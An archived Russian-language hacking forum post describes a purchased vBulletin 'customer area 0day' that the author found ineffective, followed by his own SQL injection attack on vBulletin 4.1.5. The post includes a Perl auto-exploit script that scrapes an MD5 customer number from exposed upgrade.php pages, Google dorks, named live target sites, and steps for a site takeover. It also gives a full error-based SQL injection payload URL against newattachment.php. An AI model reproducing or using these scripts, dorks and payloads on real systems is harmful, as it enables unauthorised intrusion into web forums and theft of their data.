PDA

Просмотр полной версии : Коммерчиские эксплоиты.


MikePriv8
27.02.2013, 01:00
Недавно искал новый сплоит под vBulletin.
Забрел на сайт 1337day.com и меня заинтересовал следующий топик 0дея:

code:

http://1337day.com/exploit/description/20417

Описание гласило:

Цитата:

code:

Access to Admincp and Customer area.

The target forum need to have its install directory available for this exploit to work. /forum/install/upgrade.php

----------------------------------------
Please Enter Your Customer Number
This is the number with which you log in to the vBulletin.com Members' Area
----------------------------------------

The result is MD5,
You will need to bruteforce it to get the 12 char uppercase customer number.
Then you can re-install the forum and access admin area.

Заплатив автору 150$ я получил следующий эксплоит:

vBulletin x.x.x Customer Area 0day

htaccess install dir or delete install dir.

__________________________________________________ __________
# Exploit Title: vBulletin x.x.x Customer Area 0day #
# Author(s): Pixel_death, n3tw0rk, z0ne #
# Perl script coded by n0tch #
# Product: offical software #
# Software Version x.x.x #
# Product Download: http://www.vbulletin.com (https://hpc.name/redirector.html#http://www.vbulletin.com) #
# Google Dork: intext:Powered by vBulletin® #
# Demo sites;
# LIVE WORKING DEMO: go to http://vbhacks.info/install/upgrade.php (https://hpc.name/redirector.html#http://vbhacks.info/install/upgrade.php) follow the tutorial and decrypt the MD5#
# http://www.vbseo.com/install/upgrade.php (https://hpc.name/redirector.html#http://www.vbseo.com/install/upgrade.php) #
# http://trove.nla.gov.au/forum/install/upgrade.php (https://hpc.name/redirector.html#http://trove.nla.gov.au/forum/install/upgrade.php) #
# http://www.xboxaddict.com/forums/install/upgrade.php (https://hpc.name/redirector.html#http://www.xboxaddict.com/forums/install/upgrade.php) #
__________________________________________________ ___________#

This all depends if the upgrade area is still on the forum files, if so you can see the customer number in MD5 by following these simply steps

1st: go to /install/upgrade.php
2nd: view source scroll down to the 300 maybe more and it should look like this #~

code:

Unexpected Text:%1$s";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->

As you can see var CUSTNUMBER = "38405e0bd55eec58330a6af5e960202e"; is there which can be decoded at http://d4tabase.com/forumdisplay.php?f=110 (https://hpc.name/redirector.html#http://d4tabase.com/forumdisplay.php?f=110) crack my hash section
then log in, reset admin pass and have fun^^

Auto tool script coded in perl
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common;

system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0)
{
print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
exit;
}

$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search
{
$url = $full_domain;
$lwp = LWP::UserAgent->new();
$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
$request = $lwp->post($url, ["searchHash" => "Search"]);

print " Searching $domain ----\n ";
if ($request->content =~ /CUSTNUMBER = \"(.+)\";/)
{
print "Result : $1\n";
} else {
print "Hash: Hash not found!\n";
}
}


Shouts to: n0tch, shadow008



На первый взгляд все вроде-бы отлично.
Сплоит оказался не рабочим..Но не беда,быстро переделал на пхп:

code:



А вот дальше самое интересное!
Захожу на форумы смотрю в папке инсталл фаил upgrade.php вижу в исходниках хэш.
Пробручиваю хэш получаю 12 значное число.
Ввожу в фаиле upgrade.php... форум обнавляется.. Все как в описании , но тут меня постиг первый облом.

IMAGE (https://hpc.name/redirector.html#http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg) http://i068.radikal.ru/1302/bc/3b6adca7e7cc.jpg

После установки ни один из проверенных форумов не предложил сменить пароль.

Вернулся к описанию, "Access to Admincp and Customer area".
Легче от этого не стало:

Цитата:


vbulletin.com/docs/html/main/what_is_memberarea
Цитата:
Members' Area
The Members' Area is a private part of the vBulletin.com site for registered licensed customers. The area is security protected and requires members to enter their customer number and password to again access.

The Members' Area is where you can download vBulletin releases and updates as well as access to additional documentation and resources not publically available.

The Members' Area is currently located at http://members.vbulletin.com (https://hpc.name/redirector.html#http://members.vbulletin.com).
http://www.vbulletin.com/docs/html/main/what_is_custnum (https://hpc.name/redirector.html#http://www.vbulletin.com/docs/html/main/what_is_custnum)
Цитата:
Customer Number
A customer number is a unique number allocated to everyone who purachses a vBulletin license. The customer number, along with a password is required to access the vBulletin Members' Area.



Для доступа в "Customer area" не достаточно емэйла и пароля.

Эксплоит оказался не рабочим, но что-то делать было нужно.
Мой вгляд пал на только что обновленную булку до версии: 4.1.5

code:

mmoru.com

Зарегистрировавшись , я обратил внимание что на самом сайте стоит движек vBuletin на котором возможно писать статьи.
Проверяя переменные наткнулся на sq-injection , как в последствии оказалось присущюю всем vbulletin 4.1.5.

Название: Уязвимость в vBulletin 4.1.5

Dork: Powered by Powered by vBulletin 4.1.5

Условия: Аккаунт на форуме. Разрешение на прикрепление файлов к сообщениям/темам (attachments)

Регистрируемся -> заходим на форум -> жмем создать тему или если стоит борд, то можно выбрать создать статью (второй вариант чаще срабатывал) -> в самом низу ищем Вложения "Управление вложениями" -> Открываем окно и в параметр "values[f]" вставляем наш SQL запрос.

Пример:

PHP highlight

[CODE]
[CODE]
:

http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(versio n(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1





После чего видим стандартную ошибку БД форума, следовательно открываем исходный код страницы и видим:

PHP highlight









С вами были Piv8Team (priv8.ru)